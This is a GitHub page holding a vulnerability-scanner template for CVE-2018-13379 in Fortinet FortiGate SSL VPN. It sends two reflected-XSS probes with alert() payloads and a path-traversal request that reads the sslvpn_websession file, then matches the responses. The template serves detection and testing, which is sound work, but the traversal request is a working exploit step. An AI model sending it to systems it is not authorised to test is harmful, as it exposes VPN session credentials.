forked from CharanRayudu/Custom-Nuclei-Templates
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-13379.yaml
39 lines (36 loc) · 1.31 KB
/
CVE-2018-13379.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
id: cve-2018-13379
info:
name: Fortinet Fortigate VPN Path Traversal & XSS
risk: High
params:
- root: "{{.BaseURL}}"
requests:
- method: GET
redirect: false
url: >-
{{.root}}//remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("body", "remote/login") && StringSearch("body", "<script>alert(1)")
- method: GET
redirect: false
url: >-
{{.root}}//message?title=x&msg=%26%23<svg%20onload=alert(2)>;
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("body", "remote/fgt_lang") && StringSearch("body", "<svg onload=alert(2)>")
- method: GET
redirect: false
url: >-
{{.root}}//remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("resHeaders", "application/javascript") && StringSearch("body", "fgt_lang")
references:
- link: https://www.cvebase.com/cve/2018/13379